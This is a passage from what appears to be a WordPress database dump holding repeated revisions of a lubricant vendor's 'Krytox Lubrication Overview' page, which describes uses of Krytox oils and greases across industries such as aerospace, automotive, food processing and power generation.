as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="36,38,34" number="10"]\r\n<a name="board"></a>\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n</ul>\r\nMultipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:\r\n<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="156,46,96" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="96,46,38,97" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry</li>\r\n 	<li>H-1 food grade oils and greases available Krytox works in a variety of applications:</li>\r\n 	<li>Oxygen systems and respirators</li>\r\n 	<li>Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="40,115,116,123" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Miller-Stephenson offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="36,38,115,116" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="40,171,96,97" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment up time and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="143" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-29 18:21:10', '2016-09-29 18:21:10', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2186, 2, '2016-09-29 18:26:27', '2016-09-29 18:26:27', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive2">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#board">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#petro">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#elec">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#food">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#med">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#metal">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#oxy">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#power">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#pulp">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span>\r\n\r\n<a name="aerospace"></a>\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purpose formulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing</li>\r\n 	<li>Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space</li>\r\n 	<li>Excellent frictional properties for long wear and low energy consumption</li>\r\n 	<li>Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n<a name="automotive"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather on leather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n<a name="automotive2"></a>\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided state of-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh under hood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Under hood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, anti lock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n<a name="petro"></a>\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n<a name="board"></a>\r\n[ux_product_categories ids="36,38,34" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<a name="elec"></a>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n</ul>\r\nMultipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:\r\n<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<a name="food"></a>\r\n\r\n[ux_product_categories ids="156,46,96" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<a name="med"></a>\r\n[ux_product_categories ids="96,46,38,97" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry</li>\r\n 	<li>H-1 food grade oils and greases available Krytox works in a variety of applications:</li>\r\n 	<li>Oxygen systems and respirators</li>\r\n 	<li>Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<a name="metal"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n<a name="oxy"></a>\r\n[ux_product_categories ids="40,115,116,123" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Miller-Stephenson offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<a name="power"></a>\r\n[ux_product_categories ids="36,38,115,116" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<a name="pulp"></a>\r\n\r\n[ux_product_categories ids="40,171,96,97" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment up time and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="143" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-29 18:26:27', '2016-09-29 18:26:27', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2187, 2, '2016-09-29 18:28:42', '2016-09-29 18:28:42', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive2">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#board">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#petro">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#elec">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#food">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#med">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#metal">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#oxy">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#power">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#pulp">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#text">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#tire">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n<a name="aerospace"></a>\r\n\r\n<span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span>\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purpose formulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing</li>\r\n 	<li>Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense 